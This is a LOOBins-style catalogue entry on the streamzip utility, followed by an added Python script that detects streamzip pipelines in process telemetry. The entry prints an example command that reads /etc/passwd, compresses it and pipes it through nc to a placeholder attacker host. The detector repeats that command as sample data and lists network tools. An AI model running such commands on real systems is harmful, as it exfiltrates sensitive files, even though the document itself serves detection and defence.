streamzip
Created by Gabriel De Jesus (0xv1n)
Description
streamzip is a system utility that compresses data from “stdin” and writes it directly to “stdout” without creating temporary files. Malicious actors can use it to collect and exfiltrate sensitive data without leaving staged archive artifacts on disk.
Created | Tactics | Tags |
---|---|---|
2024-07-15 | Collection, Exfiltration | files, compress |
Paths
/usr/bin/streamzip
Use Cases
Copy and compress sensitive data locally
The following command reads file data and compresses it for exfiltration:
dd if=/etc/passwd | streamzip - stream | nc ATTACKER_IP PORT
Detections
- No detection content at time of writing
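
Because streamzip leaves no staged archive on disk, process telemetry is the place to look. The following is an added example, not detection content from the original page or the LOOBins project: it groups exec events by process group and raises severity when streamzip shares a pipeline with a network tool. The event schema, the sample events and the `NETWORK_TOOLS` list are constructed assumptions.

```python
import json
import os
from collections import defaultdict

# Assumption: tools treated as network-capable consumers of the pipe.
NETWORK_TOOLS = {"nc", "ncat", "curl", "ssh", "scp"}

# Constructed exec events, one JSON object per line. The schema (pid, pgid,
# path, args) is hypothetical; map it to your own process telemetry.
SAMPLE_EVENTS = """
{"pid": 501, "pgid": 501, "path": "/bin/dd", "args": ["dd", "if=/etc/passwd"]}
{"pid": 502, "pgid": 501, "path": "/usr/bin/streamzip", "args": ["streamzip", "-", "stream"]}
{"pid": 503, "pgid": 501, "path": "/usr/bin/nc", "args": ["nc", "ATTACKER_IP", "PORT"]}
{"pid": 610, "pgid": 610, "path": "/usr/bin/perl", "args": ["perl", "/usr/bin/streamzip"]}
{"pid": 611, "pgid": 610, "path": "/bin/cat", "args": ["cat", "notes.txt"]}
{"pid": 700, "pgid": 700, "path": "/usr/bin/curl", "args": ["curl", "https://example.com"]}
"""

def is_streamzip(event):
    # A script: sensors may report the interpreter, with the script path in args.
    names = [event["path"]] + event["args"][:2]
    return any(os.path.basename(n) == "streamzip" for n in names)

def find_streamzip_pipelines(text):
    """Group exec events by process group and flag groups that run streamzip."""
    groups = defaultdict(list)
    for line in text.splitlines():
        if line.strip():
            event = json.loads(line)
            # Assumption: the pipeline shares one process group (job control).
            groups[event["pgid"]].append(event)
    alerts = []
    for pgid, members in sorted(groups.items()):
        if not any(is_streamzip(e) for e in members):
            continue
        net = sorted(os.path.basename(e["path"]) for e in members
                     if os.path.basename(e["path"]) in NETWORK_TOOLS)
        alerts.append({
            "pgid": pgid,
            # Compressed stream handed to a network tool: nothing staged on disk.
            "severity": "high" if net else "low",
            "network_tools": net,
            "commands": [" ".join(e["args"]) for e in members],
        })
    return alerts

if __name__ == "__main__":
    for alert in find_streamzip_pipelines(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Pipelines started from a shell without job control inherit the shell's process group, so in that case group by parent process and a short time window instead.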